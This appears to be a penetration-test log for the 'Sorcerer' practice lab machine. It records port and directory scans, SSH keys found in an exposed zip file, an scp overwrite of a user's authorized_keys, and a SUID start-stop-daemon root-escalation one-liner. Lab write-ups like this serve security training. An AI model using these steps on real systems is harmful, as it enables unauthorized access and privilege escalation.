🧪 Pentest Log: {{date:2025-08-13}}

🔍 Target Information

• Machine Name: Sorcerer
• IP Address: 192.168.148.100
• Operating System: Linux

ip=192.168.148.100

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 7742

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found /zipfiles directory

../
francis.zip                                        24-Sep-2020 19:27                2834
max.zip                                            24-Sep-2020 19:27                8274
miriam.zip                                         24-Sep-2020 19:27                2826
sofia.zip                                          24-Sep-2020 19:27                2818

found max.zip with ssh keys inside

Port 8080

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 22
• Vulnerability Type: N/A

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

mousepad /home/max/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer

Transfer the new authorized_keys to the victim

scp -i id_rsa -O ~/Documents/oscp/play_ground/Sorcerer/home/max/.ssh/authorized_keys max@192.168.148.100:/home/max/.ssh/authorized_keys

SSH login to gain local.txt

🧬 Privilege Escalation

👤 Current Access

• User: max
• Groups: max
• Shell Type: ssh

🔍 Enumeration

SUID:

find / -type f -perm -4000 2>/dev/null

found

/usr/sbin/start-stop-daemon

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: SUID Abuse
• Target Binary/Service: start-stop-daemon
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Smash to root

/usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p